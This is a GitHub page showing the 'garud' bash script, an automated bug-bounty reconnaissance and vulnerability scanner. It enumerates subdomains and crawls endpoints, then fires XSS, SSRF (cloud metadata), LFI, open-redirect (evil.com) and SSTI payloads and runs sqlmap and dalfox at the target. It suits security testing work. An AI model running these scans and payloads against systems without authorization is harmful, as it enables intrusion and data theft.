forked from R0X4R/Garud
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathgarud
More file actions
executable file
·355 lines (312 loc) · 24.6 KB
/
garud
File metadata and controls
executable file
·355 lines (312 loc) · 24.6 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
#!/usr/bin/env bash
# coded by R0X4R
# Garud - version 3.2
# Contributers: KathanP19 (https://github.com/KathanP19), frost19k (https://github.com/frost19k), f8al (https://github.com/f8al), theamanrawat (https://github.com/theamanrawat), remonsec (https://github.com/remonsec), simrotion13 (https://github.com/simrotion13)
#> CHECK CONNECTION
wget -q --spider http://google.com
if [ $? -ne 0 ];then
echo "Connect to internet before running Garud!"
exit 127
fi
#> VARIABLES
version="Garud v3.2"
domain=
outdir=
exclude=
threads=
blindxss=
silent=False
jsonout=False
remout=False
ports="21,22,80,81,280,300,443,583,591,593,832,981,1010,1099,1311,2082,2087,2095,2096,2480,3000,3128,3333,4243,4444,4445,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7002,7396,7474,8000,8001,8008,8009,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8530,8531,8834,8880,8887,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,10443,11371,12043,12046,12443,15672,16080,17778,18091,18092,20720,28017,32000,55440,55672"
#> COLORS
RED="\e[31m"
GREEN="\e[32m"
BOLD="\e[1m"
NORMAL="\e[0m"
#> PRINT USAGE
printusage(){
echo -e ""
echo -e "[${BOLD}GARUD${NORMAL}] - Coded by ${BOLD}R0X4R${NORMAL} in ${BOLD}INDIA${NORMAL} with ${RED}<3${NORMAL}\n"
echo -e "Example Usage:"
echo -e "garud [-d target.tld] [-o output destination] [-t threads] [-b blind xss URL] [-x OOS domains] [--json] [-s] [-r]"
echo -e ""
echo -e "Flags:"
echo -e " -b, --blind ${GREEN}string${NORMAL} Add your xss server for BXSS -b test.xss.ht"
echo -e " -d, --domain ${GREEN}string${NORMAL} Add your target -d target.tld"
echo -e " -o, --output ${GREEN}string${NORMAL} Write to output folder -o results"
echo -e " -t, --threads ${GREEN}int${NORMAL} Number of threads -t 100"
echo -e " -x, --exclude ${GREEN}string${NORMAL} Exclude out of scope domains -x /home/oosd.txt"
echo -e ""
echo -e "Optional Flags:"
echo -e " -s, --silent Hide output in the terminal ${GREEN}Default: ${RED}False${NORMAL}"
echo -e " -j, --json Store output in a single json file ${GREEN}Default: ${RED}False${NORMAL}"
echo -e " -r, --remove Delete everything except json output ${GREEN}Default: ${RED}False${NORMAL}"
echo -e " -v, --version Print current version of Garud"
exit 0
}
#> ARGUMENT FLAGS
while [ -n "$1" ]; do
case $1 in
-b|--blind)
blindxss=$2
shift ;;
-d|--domain)
domain=$2
shift ;;
-h|--help)
printusage
shift ;;
-o|--output)
outdir=$2
shift ;;
-j|--json)
jsonout='true'
;;
-s|--silent)
silent='true'
;;
-t|--threads)
threads=$2
shift ;;
-r|--remove)
remout='true'
shift ;;
-x|--exclude)
exclude=$2
shift ;;
-v|--version)
echo -e "$version"
exit 0 ;;
*)
printusage
esac
shift
done
#> INITIAL CONFIGS
if [ -z "$domain" ]; then
echo -e "\n${RED}ERROR${NORMAL} - Target not supplied.\n${NORMAL}"
printusage
fi
if [ -z "$outdir" ]; then
echo -e "\n${RED}ERROR${NORMAL} - Output destination not supplied.\n${NORMAL}"
printusage
fi
if [ -z "$threads" ]; then
threads=100
fi
## For Docker Compatibility
if [ -z "$CHROME_BIN" ]; then
CHROME_BIN="/snap/bin/chromium"
fi
if [ "$remout" == "true" ]; then
jsonout='true'
fi
#> TRAP FUNCTION
trap ctrl_c INT
ctrl_c(){
echo -e ""
echo -e "${RED}[!] ${NORMAL}KEYBOARD INTERRUPTION, ${GREEN}EXITING GARUD${NORMAL}..."
exit 127
}
mkdir -p $outdir
cd $outdir
#> BANNER
banner(){
clear
echo -e ""
echo -e "${RED} \t\t █▀▀ ▄▀█ █▀█ █░█ █▀▄"
echo -e " \t\t █▄█ █▀█ █▀▄ █▄█ █▄▀ v3.2"
echo -e "${NORMAL}${BOLD}\n \t\tcoded by R0X4R in ${RED}INDIA${NORMAL}${BOLD} with ${RED}<3${NORMAL}\n"
echo -e "- TARGET: ${GREEN}$domain${NORMAL} \t - OUTPUT: ${GREEN}$(pwd)${NORMAL}"
echo -e ""
echo -e "[Garud] - Scanning started on $domain at $(date)" | notify -silent
}
#> MAKE FOLDERS
makedir(){
mkdir -p .tmp
mkdir -p domains
mkdir -p domains/patterns
mkdir -p domains/fuzz
mkdir -p injections
mkdir -p nuclei
[ "$jsonout" == "False" ] || mkdir -p .json
}
#> SUBDOMAIN ENUMERATION
passiveenum(){
[ ! -f ".tmp/crt.txt" ] && curl -s "https://crt.sh/?q=%25.$domain&output=json" | jq -r '.[].name_value' 2>/dev/null | sed 's/\*\.//g' | sort -u | grep -o "\w.*$domain" | anew -q .tmp/crt.txt
[ ! -f ".tmp/hackertarget.txt" ] && curl -s "https://api.hackertarget.com/hostsearch/?q=$domain" | grep -o "\w.*$domain" | anew -q .tmp/hackertarget.txt
[ ! -f ".tmp/riddler.txt" ] && curl -s "https://riddler.io/search/exportcsv?q=pld:$domain" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep -o "\w.*$domain" | anew -q .tmp/riddler.txt
[ ! -f ".tmp/assetfinder.txt" ] && assetfinder --subs-only $domain | anew -q .tmp/assetfinder.txt
[ ! -f ".tmp/sublister.txt" ] && python3 ~/tools/Sublist3r/sublist3r.py -d $domain -o .tmp/sublister.txt &> /dev/null
[ ! -f ".tmp/subfinder.txt" ] && subfinder -silent -d $domain -all -t $threads -o .tmp/subfinder.txt &> /dev/null
[ ! -f ".tmp/amass.txt" ] && amass enum -passive -d $domain -o .tmp/amass.txt &> /dev/null
[ ! -f ".tmp/crobat.txt" ] && crobat -s $domain | anew -q .tmp/crobat.txt
}
activeenum(){
[ ! -f ".tmp/ffuf.json" ] && ffuf -u http://FUZZ.$domain/ -t 100 -p '1.0-2.0' -w ~/wordlists/subdomains.txt -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" -mc 200 -r -o .tmp/ffuf.json -s 2> /dev/null &> /dev/null
cat .tmp/ffuf.json 2> /dev/null | jq -r '.results[] | .host' 2> /dev/null | anew -q .tmp/ffuf.txt
[ ! -f ".tmp/gobuster.txt" ] && gobuster dns -d $domain --no-error -z -q -t 50 -w ~/wordlists/subdomains.txt 2> /dev/null | sed 's/Found: //g' | anew -q .tmp/gobuster.txt
[ ! -f ".tmp/amassact.txt" ] && timeout 50m amass enum -active -brute -w ~/wordlists/subdomains.txt -d $domain -o .tmp/amassact.txt &> /dev/null
}
secondlevel(){
cat .tmp/*.txt | grep -v "*" | sed '/@\|<BR>\|\_\|*/d' | grep "$domain" | anew -q .tmp/domains
[ ! -f ".tmp/seconddomains.txt" ] && xargs -a .tmp/domains -P 50 -I % bash -c "assetfinder --subs-only % | anew -q .tmp/seconddomains.txt" 2> /dev/null; timeout 30m xargs -a .tmp/domains -P 10 -I % bash -c "amass enum -passive -d %" 2> /dev/null | anew -q .tmp/seconddomains.txt
}
domaincheck(){
#> FILTERING DOMAINS
if [ -f "$exclude" ]; then
cat .tmp/*.txt | grep -v "*" | grep -vf $exclude | sort -u | sed '/@\|<BR>\|\_\|*/d' | dnsx -retry 2 -r ~/wordlists/resolvers.txt -t 100 -silent | anew -q domains/subdomains.txt
else
cat .tmp/*.txt | grep -v "*" | sort -u | sed '/@\|<BR>\|\_\|*/d' | dnsx -retry 2 -r ~/wordlists/resolvers.txt -t 100 -silent | anew -q domains/subdomains.txt
fi
#> WEB PROBING AND SCREENSHOT
[ "$jsonout" == "False" ] || cat domains/subdomains.txt | python3 -c "import sys; import json; print (json.dumps({'subdomains':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/subdomains.json &> /dev/null
[ ! -f "domains/ports.txt" ] && naabu -retries 2 -r ~/wordlists/resolvers.txt -l domains/subdomains.txt --port $ports -silent -no-color 2> /dev/null | anew -q domains/ports.txt
[ "$jsonout" == "False" ] || cat domains/ports.txt | python3 -c "import sys; import json; print (json.dumps({'ports':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/ports.json &> /dev/null
[ ! -f "domains/probes.txt" ] && xargs -a domains/ports.txt -P 50 -I % bash -c "echo % | httpx -silent -threads 150 -status-code -title -timeout 20 -retries 2 -follow-host-redirects -random-agent -no-color" 2> /dev/null | anew -q domains/probes.txt
cat domains/probes.txt | awk '{print $1}' 2> /dev/null | anew -q domains/liveurls.txt
[ "$jsonout" == "False" ] || cat domains/liveurls.txt | python3 -c "import sys; import json; print (json.dumps({'liveurls':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/liveurls.json &> /dev/null
[ ! -d domains/aquatone ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "echo % | aquatone -chrome-path $CHROME_BIN -out domains/aquatone/ -threads 10 -silent" 2> /dev/null &> /dev/null
}
subenum(){
echo -e "${BOLD}Starting subdomain enumeration of $domain${NORMAL}"
passiveenum
activeenum
secondlevel
domaincheck
[ "$silent" == "False" ] && cat domains/liveurls.txt 2> /dev/null
[ "$silent" == "False" ] && echo -e "${RED}${BOLD}-- SUBDOMAINS: $(cat domains/liveurls.txt 2> /dev/null | wc -l)${NORMAL}\n"
echo -e "[$(date)] - Subdomain enumeration completed, total [Subdomains:$(cat domains/subdomains.txt | wc -l) Activeurls:$(cat domains/liveurls.txt | wc -l)] found" | notify -silent &> /dev/null
}
#> WEB CRAWLING AND FILTERING
webcrawl(){
echo -e "${BOLD}Crawling subdomains of $domain${NORMAL}"
[ ! -f ".tmp/gospider.txt" ] && timeout 50m gospider -S domains/liveurls.txt -d 10 -c 20 -t 50 -K 3 --no-redirect --js -a -w --blacklist ".(eot|jpg|jpeg|gif|css|tif|tiff|png|ttf|otf|woff|woff2|ico|svg|txt)" --include-subs -q -o .tmp/gospider 2> /dev/null | anew -q .tmp/gospider.txt
[ ! -f ".tmp/waybackurls.txt" ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "echo % | waybackurls" 2> /dev/null | anew -q .tmp/waybackurls.txt
[ ! -f ".tmp/gauplus.txt" ] && cat domains/liveurls.txt | gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t $threads -o .tmp/gauplus.txt
cat .tmp/gospider.txt .tmp/gauplus.txt .tmp/waybackurls.txt 2> /dev/null | sed '/\[/d' | grep $domain | sort -u | uro | anew -q domains/endpoints.txt # <-- Filtering duplicate and common endpoints
[ "$jsonout" == "False" ] || cat domains/endpoints.txt | python3 -c "import sys; import json; print (json.dumps({'endpoints':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/endpoints.json &> /dev/null
#> FILTERING ENDPOINTS USING PATTERNS
if [ -s "domains/endpoints.txt" ]; then
gf xss domains/endpoints.txt | sed "s/'\|(\|)//g" | bhedak "FUZZ" 2> /dev/null | anew -q domains/patterns/xss.txt
gf lfi domains/endpoints.txt | sed "s/'\|(\|)//g" | bhedak "FUZZ" 2> /dev/null | anew -q domains/patterns/lfi.txt
gf rce domains/endpoints.txt | sed "s/'\|(\|)//g" | bhedak "FUZZ" 2> /dev/null | anew -q domains/patterns/rce.txt
gf ssrf domains/endpoints.txt | sed "s/'\|(\|)//g" | bhedak "FUZZ" 2> /dev/null | anew -q domains/patterns/ssrf.txt
gf ssti domains/endpoints.txt | sed "s/'\|(\|)//g" | bhedak "FUZZ" 2> /dev/null | anew -q domains/patterns/ssti.txt
gf sqli domains/endpoints.txt | sed "s/'\|(\|)//g" | bhedak "FUZZ" 2> /dev/null | anew -q domains/patterns/sqli.txt
gf redirect domains/endpoints.txt | sed "s/'\|(\|)//g" | bhedak "FUZZ" 2> /dev/null | anew -q domains/patterns/redirect.txt
else
echo -e "[!] - \"domains/endpoints.txt\" file not found or doesn't contain anything"
exit 127
fi
if [ -s "~/tools/payloads/ssti.txt" ] && [ -s "~/tools/payloads/lfi.txt" ]; then
cat ~/tools/payloads/ssti.txt | while read -r line; do
cat domains/patterns/ssti.txt | bhedak "$line" 2> /dev/null | anew -q .tmp/ssti.txt
done
cat ~/tools/payloads/lfi.txt | while read -r line; do
cat domains/patterns/lfi.txt | bhedak "$line" 2> /dev/null | anew -q .tmp/lfi.txt
done
else
wget -O ~/tools/payloads/lfi.txt https://raw.githubusercontent.com/R0X4R/Garud/master/.github/payloads/lfi.txt -q --no-check-certificate
wget -O ~/tools/payloads/ssti.txt https://raw.githubusercontent.com/R0X4R/Garud/master/.github/payloads/ssti.txt -q --no-check-certificate
cat ~/tools/payloads/ssti.txt | while read -r line; do
cat domains/patterns/ssti.txt | bhedak "$line" 2> /dev/null | anew -q .tmp/ssti.txt
done
cat ~/tools/payloads/lfi.txt | while read -r line; do
cat domains/patterns/lfi.txt | bhedak "$line" 2> /dev/null | anew -q .tmp/lfi.txt
done
fi
[ -s "domains/patterns/ssrf.txt" ] && cat domains/patterns/ssrf.txt | bhedak "http://169.254.169.254/latest/meta-data/hostname" 2> /dev/null | anew -q .tmp/ssrf.txt
[ -s "domains/patterns/xss.txt" ] && xargs -a domains/patterns/xss.txt -P 30 -I % bash -c "echo % | kxss" 2> /dev/null | grep "< >\|\"" | awk '{print $2}' | anew -q .tmp/xssp.txt
[ -s ".tmp/xssp.txt" ] && cat .tmp/xssp.txt 2> /dev/null | bhedak "\">/><svg/onload=confirm(document.domain)>" 2> /dev/null | anew -q .tmp/xss.txt
[ -s "domains/patterns/redirect.txt" ] && cat domains/patterns/redirect.txt | bhedak "http://www.evil.com/" 2> /dev/null | anew -q .tmp/redirect.txt
}
#> NUCLEI SCAN
nucleiscan(){
echo -e "${BOLD}Starting nuclei scan on $domain${NORMAL}"
nuclei -update-templates 2> /dev/null &> /dev/null
[ ! -f "nuclei/info.txt" ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -nc -severity info -c 50 -silent" 2> /dev/null | anew -q nuclei/info.txt
[ ! -f "nuclei/low.txt" ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -nc -severity low -c 50 -silent" 2> /dev/null | anew nuclei/low.txt | notify -silent &> /dev/null
[ ! -f "nuclei/medium.txt" ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -nc -severity medium -c 50 -silent" 2> /dev/null | anew nuclei/medium.txt | notify -silent &> /dev/null
[ ! -f "nuclei/high.txt" ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -nc -severity high -c 50 -silent" 2> /dev/null | anew nuclei/high.txt | notify -silent &> /dev/null
[ ! -f "nuclei/critical.txt" ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -nc -severity critical -c 50 -silent" 2> /dev/null | anew nuclei/critical.txt | notify -silent &> /dev/null
[ "$jsonout" == "False" ] || cat nuclei/info.txt | python3 -c "import sys; import json; print (json.dumps({'nuclei_info':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/info.json &> /dev/null
[ "$jsonout" == "False" ] || cat nuclei/low.txt | python3 -c "import sys; import json; print (json.dumps({'nuclei_low':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/low.json &> /dev/null
[ "$jsonout" == "False" ] || cat nuclei/medium.txt | python3 -c "import sys; import json; print (json.dumps({'nuclei_medium':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/medium.json &> /dev/null
[ "$jsonout" == "False" ] || cat nuclei/high.txt | python3 -c "import sys; import json; print (json.dumps({'nuclei_high':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/high.json &> /dev/null
[ "$jsonout" == "False" ] || cat nuclei/critical.txt | python3 -c "import sys; import json; print (json.dumps({'nuclei_critical':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/critical.json &> /dev/null
[ "$silent" == "False" ] && cat nuclei/*.txt
}
#> VULNERABILITY SCANNING
vulnscan(){
echo -e "${BOLD}Starting vulnerability scan on $domain${NORMAL}"
[ ! -f "injections/crlf.txt" ] && crlfuzz -l domains/liveurls.txt -c $threads -s | anew injections/crlf.txt | notify -silent &> /dev/null
[ "$silent" == "False" ] && cat injections/crlf.txt 2> /dev/null
[ "$jsonout" == "False" ] || cat injections/crlf.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'vuln_crlf':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/crlf.json &> /dev/null
[ "$silent" == "False" ] && echo -e "${RED}${BOLD}-- CRLF: $(cat injections/crlf.txt 2> /dev/null | wc -l)${NORMAL}\n"
cat domains/endpoints.txt | cut -d"?" -f1 | cut -d"=" -f1 | grep -iaE "([^.]+)\.zip$|([^.]+)\.zip\.[0-9]+$|([^.]+)\.zip[0-9]+$|([^.]+)\.zip[a-z][A-Z][0-9]+$|([^.]+)\.zip\.[a-z][A-Z][0-9]+$|([^.]+)\.rar$|([^.]+)\.tar$|([^.]+)\.tar\.gz$|([^.]+)\.tgz$|([^.]+)\.sql$|([^.]+)\.db$|([^.]+)\.sqlite$|([^.]+)\.pgsql\.txt$|([^.]+)\.mysql\.txt$|([^.]+)\.gz$|([^.]+)\.config$|([^.]+)\.log$|([^.]+)\.bak$|([^.]+)\.backup$|([^.]+)\.bkp$|([^.]+)\.crt$|([^.]+)\.dat$|([^.]+)\.eml$|([^.]+)\.java$|([^.]+)\.lst$|([^.]+)\.key$|([^.]+)\.passwd$|([^.]+)\.pl$|([^.]+)\.pwd$|([^.]+)\.mysql-connect$|([^.]+)\.jar$|([^.]+)\.cfg$|([^.]+)\.dir$|([^.]+)\.orig$|([^.]+)\.bz2$|([^.]+)\.old$|([^.]+)\.vbs$|([^.]+)\.img$|([^.]+)\.inf$|([^.]+)\.sh$|([^.]+)\.py$|([^.]+)\.vbproj$|([^.]+)\.mysql-pconnect$|([^.]+)\.war$|([^.]+)\.go$|([^.]+)\.psql$|([^.]+)\.sql\.gz$|([^.]+)\.vb$|([^.]+)\.webinfo$|([^.]+)\.jnlp$|([^.]+)\.cgi$|([^.]+)\.tmp$|([^.]+)\.ini$|([^.]+)\.webproj$|([^.]+)\.xsql$|([^.]+)\.raw$|([^.]+)\.inc$|([^.]+)\.lck$|([^.]+)\.nz$|([^.]+)\.rc$|([^.]+)\.html\.gz$|([^.]+)\.gz$|([^.]+)\.env$|([^.]+)\.yml$" | httpx -silent -follow-host-redirects | anew -q domains/sensitivefiles.txt &> /dev/null
[ "$jsonout" == "False" ] || cat domains/sensitivefiles.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'sensitive':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/sensitive.json &> /dev/null
[ ! -f "injections/ssti.txt" ] && xargs -a .tmp/ssti.txt -P 50 -I % bash -c "curl -s -L -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"check-ssti49\" && echo -e \"[POTENTIAL SSTI] - % \n \"" 2> /dev/null | grep "POTENTIAL SSTI" | anew injections/ssti.txt | notify -silent &> /dev/null
[ "$silent" == "False" ] && cat injections/ssti.txt 2> /dev/null
[ "$jsonout" == "False" ] || cat injections/ssti.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'vuln_ssti':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/ssti.json &> /dev/null
[ "$silent" == "False" ] && echo -e "${RED}${BOLD}-- SERVER-SIDE TEMPLATE INJECTION: $(cat injections/ssti.txt 2> /dev/null | wc -l)${NORMAL}\n"
[ ! -f "injections/xss.txt" ] && xargs -a .tmp/xss.txt -P 50 -I % bash -c "curl -s -L -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"<svg/onload=confirm(document.domain)>\" && echo -e \"[POTENTIAL XSS] - % \n \"" 2> /dev/null | grep "POTENTIAL XSS" | anew injections/xss.txt | notify -silent &> /dev/null
[ "$silent" == "False" ] && cat injections/xss.txt 2> /dev/null
[ "$jsonout" == "False" ] || cat injections/xss.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'vuln_xss':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/xss.json &> /dev/null
[ "$silent" == "False" ] && echo -e "${RED}${BOLD}-- CROSS-SITE SCRIPTING: $(cat injections/xss.txt 2> /dev/null | wc -l)${NORMAL}\n"
[ ! -f "injections/ssrf.txt" ] && xargs -a .tmp/ssrf.txt -P 50 -I % bash -c "curl -ks -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"compute.internal\" && echo -e \"[POTENTIAL SSRF] - % \n \"" 2> /dev/null | grep "POTENTIAL SSRF" | anew injections/ssrf.txt | notify -silent &> /dev/null
[ "$silent" == "False" ] && cat injections/ssrf.txt 2> /dev/null
[ "$jsonout" == "False" ] || cat injections/ssrf.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'vuln_ssrf':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/ssrf.json &> /dev/null
[ "$silent" == "False" ] && echo -e "${RED}${BOLD}-- SERVER-SIDE REQUEST FORGERY: $(cat injections/ssrf.txt 2> /dev/null | wc -l)${NORMAL}\n"
[ ! -f "injections/lfi.txt" ] && xargs -a .tmp/lfi.txt -P 50 -I % bash -c "curl -s -L -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"root:x:\" && echo -e \"[POTENTIAL LFI] - % \n \"" 2> /dev/null | grep "POTENTIAL LFI" | anew injections/lfi.txt | notify -silent &> /dev/null
[ "$silent" == "False" ] && cat injections/lfi.txt 2> /dev/null
[ "$jsonout" == "False" ] || cat injections/lfi.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'vuln_lfi':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/lfi.json &> /dev/null
[ "$silent" == "False" ] && echo -e "${RED}${BOLD}-- LOCAL FILE INCLUSION: $(cat injections/lfi.txt 2> /dev/null | wc -l)${NORMAL}\n"
[ ! -f "injections/redirect.txt" ] && xargs -a .tmp/redirect.txt -P 50 -I % bash -c "curl -s -iL -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"Evil.Com - We get it...Daily\" && echo -e \"[POTENTIAL REDIRECT] - % \n \"" 2> /dev/null | grep "POTENTIAL REDIRECT" | anew injections/redirect.txt | notify -silent &> /dev/null
[ "$silent" == "False" ] && cat injections/redirect.txt 2> /dev/null
[ "$jsonout" == "False" ] || cat injections/redirect.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'vuln_redirect':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/redirect.json &> /dev/null
[ "$silent" == "False" ] && echo -e "${RED}${BOLD}-- OPEN-redirectION: $(cat injections/redirect.txt 2> /dev/null | wc -l)${NORMAL}\n"
[ ! -d injections/sqli ] && timeout 50m xargs -a domains/patterns/sqli.txt -P 50 -I % bash -c "python3 ~/tools/sqlmap/sqlmap.py -u % -b --batch --disable-coloring --random-agent --output-dir=injections/sqli/" 2> /dev/null &> /dev/null
if [ -n "$blindxss" ]; then
dalfox file .tmp/xssp.txt --silence --no-color --no-spinner --mass --mass-worker 100 --skip-bav -b $blindxss -w 100 -H "X-Bugbounty: Testing" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" 2> /dev/null | anew injections/dalfoxss.txt | notify -silent &> /dev/null
else
dalfox file .tmp/xssp.txt --silence --no-color --no-spinner --mass --mass-worker 100 --skip-bav -w 100 -H "X-Bugbounty: Testing" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" 2> /dev/null | anew injections/dalfoxss.txt | notify -silent &> /dev/null
fi
[ "$silent" == "False" ] && cat injections/dalfoxss.txt 2> /dev/null
[ "$jsonout" == "False" ] || cat injections/dalfoxss.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'dalfox':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/dalfox.json &> /dev/null
[ "$silent" == "False" ] && echo -e "${RED}${BOLD}-- DALFOX: $(cat injections/dalfoxss.txt 2> /dev/null | wc -l)${NORMAL}\n"
[ "$jsonout" == "False" ] || cat .json/*.json | jq -s 'add' 2> /dev/null | tee output.json &> /dev/null
[ "$remout" == "True" ] && rm -rf domains/*.txt domains/patterns/ injections/*.txt nuclei/
}
#> DIRECTORY FUZZING
fuzzdir(){
echo -e "${BOLD}Starting directory fuzzing on $domain${NORMAL}"
for target in $(cat domains/liveurls.txt); do
fuzzout=$(echo $target | awk -F// '{print $NF}' | sed -E 's/[\.|:]+/_/g')
ffuf -u $target/FUZZ -ac -t 150 -mc 200 -sf -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" -w ~/wordlists/fuzz.txt -p '0.6-1.2' -e .html,.json,.php,.asp,.aspx,.log,.sql,.txt,.asp,.jsp,.bak,~,.db -maxtime 900 -o domains/fuzz/$fuzzout.json -s 2> /dev/null &> /dev/null
cat domains/directories/$fuzzout.json | jq -r '.results[] | .status, .length, .url' 2> /dev/null | xargs -n3 | anew -q domains/directories/$fuzzout.txt
rm -rf domains/directories/$fuzzout.json
done
}
#> SENDING FINAL NOTIFICATION
sendnote(){
echo -e ""
echo -e "${BOLD}Scanning completed on $domain${NORMAL}"
echo -e "[Garud] - Scanning completed on $domain at $(date)" | notify -silent
}
vault(){
subenum 2> /dev/null
webcrawl 2> /dev/null
nucleiscan 2> /dev/null
vulnscan 2> /dev/null
fuzzdir 2> /dev/null
sendnote 2> /dev/null
}
while true
do
banner
makedir
vault
exit 0
done